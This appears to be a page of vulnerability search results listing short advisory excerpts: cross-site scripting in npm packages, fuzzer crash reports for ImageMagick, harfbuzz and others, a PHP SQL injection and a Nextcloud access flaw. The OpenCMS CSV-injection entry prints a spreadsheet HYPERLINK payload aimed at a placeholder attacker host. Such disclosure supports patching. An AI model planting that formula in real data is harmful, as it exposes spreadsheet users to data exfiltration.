258 matches found
zziplib security update
0.13.62-11 - Fix CVE-2018-6541 - Part of the original patch has already been applied in the past CVE-2018-7726, so the bug should not be reproducible in a way described in the github issue, even without this commit. Applying the rest of the original patch anyway. -...
CVE-2019-12978
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c...
Cross-Site Scripting
Overview Versions of ids-enterprise prior to 4.18.2 are vulnerable to Cross-Site Scripting XSS. The soho-dropdown component does not properly encode its output and may allow attackers to execute arbitrary JavaScript. Recommendation Upgrade to version 4.18.2 or later References - GitHub Issue -...
Cross-Site Scripting
Overview Versions of ids-enterprise prior to 4.18.2 are vulnerable to Cross-Site Scripting XSS. Script tags in the soho-autocomplete component are not properly encoded and may allow attackers to execute arbitrary JavaScript. Recommendation Upgrade to version 4.18.2 or later References - GitHub...
Cross-Site Scripting
Overview Versions of ag-grid-community prior to 14.0.0 are vulnerable to Cross-Site Scripting XSS. Grid contents are not properly sanitized and may allow attackers to execute arbitrary JavaScript if user input is rendered in the grid. Recommendation Upgrade to version 14.0.0 or later References -...
OpenCMS 10.5.4 CSV Injection
Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...
Cross-Site Scripting
Overview All version of bootbox are vulnerable to Cross-Site Scripting. The package does not sanitize user input in the provided dialog boxes, allowing attackers to inject HTML code and execute arbitrary JavaScript. Recommendation Sanitize user input being passed to bootbox or consider using an...
Insecure Credential Storage
Overview All versions of web3 are vulnerable to Insecure Credential Storage. The package stores encrypted wallets in local storage and requires a password to load the wallet. Once the wallet is loaded, the private key is accessible via LocalStorage. Exploiting this vulnerability likely requires a...
Nextcloud: External Storage - WebDAV - New user has access to storage from deleted user (same user-ID)
Delete existing user account "user3" Create new user account "user3" Also reported on https://github.com/nextcloud/server/issues/15258 Impact Newly created user with same user-id of a deleted user has access to the configured external webdav storage from the deleted user...
Rate Limiting Bypass
Overview All versions of express-brute are vulnerable to Rate Limiting Bypass. Concurrent requests may lead to race conditions that cause the package to incorrectly count requests. This may allow an attacker to bypass the rate limiting provided by the package and execute requests without limiting...
Cross-Site Scripting
Overview All versions of materialize-css are vulnerable to Cross-Site Scripting. The tooltip component does not sufficiently sanitize user input, allowing an attacker to execute arbitrary JavaScript code if the malicious input is rendered by a user. Recommendation No fix is currently available...
openh264/decoder_fuzzer: Heap-use-after-free in WelsDec::MapColToList0
Project: https://github.com/cisco/openh264.git Detailed report: https://oss-fuzz.com/testcase?key=5644886558113792 Project: openh264 Fuzzer: libFuzzeropenh264decoderfuzzer Fuzz target binary: decoderfuzzer Job Type: libfuzzerasanopenh264 Platform Id: linux Crash Type: Heap-use-after-free READ 4...
Cross-Site Scripting
Overview All versions of editor.md are vulnerable to Cross-Site Scripting. User input is insufficiently sanitized, allowing attackers to inject malicious code in payloads containing base64-encoded content. Recommendation No fix is currently available. Consider using an alternative module until a...
lzma/lzmaenc_fuzzer: Heap-buffer-overflow in OutputBuffer::Write
Detailed report: https://oss-fuzz.com/testcase?key=5641558126231552 Project: lzma Fuzzer: libFuzzerlzmalzmaencfuzzer Fuzz target binary: lzmaencfuzzer Job Type: libfuzzerasanlzma Platform Id: linux Crash Type: Heap-buffer-overflow WRITE 12 Crash Address: 0x631000024800 Crash State:...
PHP MySQLi Database Class 2.9.2 SQL Injection
https://packagist.org/packages/joshcam/mysqli-database-class aka https://github.com/ThingEngineer/PHP-MySQLi-Database-Class v2.9.2 is vulnerable to SQL injection in functon Where because of special "forkaround" at line 971 If $whereValue happens to be an array, key value is used as $operator to...
harfbuzz/hb-subset-fuzzer: Heap-buffer-overflow in BEInt<unsigned char, 1>::set
Project: https://github.com/harfbuzz/harfbuzz.git Detailed report: https://oss-fuzz.com/testcase?key=5760768497156096 Project: harfbuzz Fuzzer: libFuzzerharfbuzzhb-subset-fuzzer Fuzz target binary: hb-subset-fuzzer Job Type: libfuzzerasanharfbuzz Platform Id: linux Crash Type: Heap-buffer-overflo...
tidy-html5/tidy_fuzzer: Crash in GetSurrogatePair
Detailed report: https://oss-fuzz.com/testcase?key=5741081738608640 Project: tidy-html5 Fuzzer: libFuzzertidy-html5tidyfuzzer Fuzz target binary: tidyfuzzer Job Type: libfuzzerasantidy-html5 Platform Id: linux Crash Type: UNKNOWN READ Crash Address: 0x604000010000 Crash State: GetSurrogatePair...
Process Hacker - A Free, Powerful, Multi-Purpose Tool That Helps You Monitor System Resources, Debug Software And Detect Malware
A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware. System requirements Windows 7 or higher, 32-bit or 64-bit. Features A detailed overview of system activity with highlighting. Graphs and statistics allow you quickly to track down...
imagemagick/ping_dng_fuzzer: Use-of-uninitialized-value in std::__1::basic_streambuf<char, std::__1::char_traits<char> >::xsgetn
Project: https://github.com/imagemagick/imagemagick.git Detailed report: https://oss-fuzz.com/testcase?key=5662852382195712 Project: imagemagick Fuzzer: libFuzzerimagemagickpingdngfuzzer Fuzz target binary: pingdngfuzzer Job Type: libfuzzermsanimagemagick Platform Id: linux Crash Type:...
libxls/fuzz_xls: Heap-buffer-overflow in xls_isCellTooSmall
Project: https://github.com/libxls/libxls.git Detailed report: https://oss-fuzz.com/testcase?key=5085850579238912 Project: libxls Fuzzer: afllibxlsfuzzxls Fuzz target binary: fuzzxls Job Type: aflasanlibxls Platform Id: linux Crash Type: Heap-buffer-overflow READ 1 Crash Address: 0x603000002008...